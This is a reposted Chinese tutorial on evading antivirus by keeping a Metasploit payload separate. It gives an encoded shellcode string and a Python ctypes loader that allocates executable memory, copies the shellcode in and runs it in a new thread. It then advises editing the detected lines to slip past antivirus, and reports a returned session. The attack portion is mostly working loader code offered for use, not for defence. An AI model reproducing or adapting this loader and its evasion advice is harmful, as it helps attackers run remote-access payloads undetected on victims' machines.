文章詳情頁

通過Python實現Payload分離免殺過程詳解

瀏覽：6日期：2022-07-17 17:54:05

缺點：

編譯成exe以后體積過大

實現：

msf生成shellcode代碼：

通過Python實現Payload分離免殺過程詳解

將payload給copy下來，去除引號。

x2fx4fx69x43x41x41x41x41x59x49x6ex6cx4dx63x42x6bx69x31x41x77x69x31x49x4dx69x31x49x55x69x33x49x6fx44x37x64x4bx4ax6ax48x2fx72x44x78x68x66x41x49x73x49x4dx48x50x44x51x48x48x34x76x4ax53x56x34x74x53x45x49x74x4bx50x49x74x4dx45x58x6ax6ax53x41x48x52x55x59x74x5ax49x41x48x54x69x30x6bx59x34x7ax70x4ax69x7ax53x4cx41x64x59x78x2fx36x7ax42x7ax77x30x42x78x7ax6ax67x64x66x59x44x66x66x67x37x66x53x52x31x35x46x69x4cx57x43x51x42x30x32x61x4cx44x45x75x4cx57x42x77x42x30x34x73x45x69x77x48x51x69x55x51x6bx4ax46x74x62x59x56x6cx61x55x66x2fx67x58x31x39x61x69x78x4cx72x6ax56x31x6fx4dx7ax49x41x41x47x68x33x63x7ax4ax66x56x47x68x4dx64x79x59x48x69x65x6ax2fx30x4cx69x51x41x51x41x41x4bx63x52x55x55x47x67x70x67x47x73x41x2fx39x56x71x43x6dx6ax41x71x41x4dx38x61x41x49x41x44x51x57x4ax35x6cx42x51x55x46x42x41x55x45x42x51x61x4fx6fx50x33x2bx44x2fx31x5ax64x71x45x46x5ax58x61x4ax6dx6cx64x47x48x2fx31x59x58x41x64x41x72x2fx54x67x68x31x37x4fx68x6ex41x41x41x41x61x67x42x71x42x46x5ax58x61x41x4cx5ax79x46x2fx2fx31x59x50x34x41x48x34x32x69x7ax5ax71x51x47x67x41x45x41x41x41x56x6dx6fx41x61x46x69x6bx55x2bx58x2fx31x5ax4ex54x61x67x42x57x55x31x64x6fx41x74x6ex49x58x2fx2fx56x67x2fx67x41x66x53x68x59x61x41x42x41x41x41x42x71x41x46x42x6fx43x79x38x50x4dx50x2fx56x56x32x68x31x62x6bx31x68x2fx39x56x65x58x76x38x4dx4ax41x2bx46x63x50x2fx2fx2fx2bx6dx62x2fx2fx2fx2fx41x63x4dx70x78x6ex58x42x77x37x76x77x74x61x4ax57x61x67x42x54x2fx39x55x3d

將自己的代碼放入第3行的shell_code位置。

import ctypes,base64 encode_shellcode = 'shell_code'shellcode = base64.b64decode(encode_shellcode)rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代碼是絕對會被查殺的，但是可以通過修改代碼繞過。思路如下，先查找殺軟查殺哪里，再修改殺軟查殺的代碼，同時保證正常運行。提示一下，查殺的代碼再5-6行之間，對其進行修改即可。

返回session：

通過Python實現Payload分離免殺過程詳解

免殺效果：

通過Python實現Payload分離免殺過程詳解

參考資料：

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部內容，希望對大家的學習有所幫助，也希望大家多多支持好吧啦網。

Python 編程

上一條：python 制作python包,封裝成可用模塊教程下一條：python上selenium的彈框操作實現

相關文章：

1. XML入門精解之結構與語法2. HTML DOM setInterval和clearInterval方法案例詳解3. CSS Hack大全-教你如何區分出IE6-IE10、FireFox、Chrome、Opera4. 輕松學習XML教程5. Xml簡介_動力節點Java學院整理6. HTML <!DOCTYPE> 標簽7. CSS 使用Sprites技術實現圓角效果8. XML入門的常見問題(二)9. WMLScript的語法基礎10. 詳解CSS偽元素的妙用單標簽之美

排行榜

					
					JavaScript實現通訊錄功能
Docker容器如何更新打包并上傳到阿里云
spring+mybatis實現圖書管理系統
Django結合使用Scrapy爬取數據入庫的方法示例
詳解CSS偽元素的妙用單標簽之美
PHP設計模式中工廠模式深入詳解
快速解決ajax返回值給外部函數的問題
Jsp中request的3個基礎實踐
JavaScript實現組件化和模塊化方法詳解
AJAX的跨域問題解決方案
WMLScript的語法基礎
				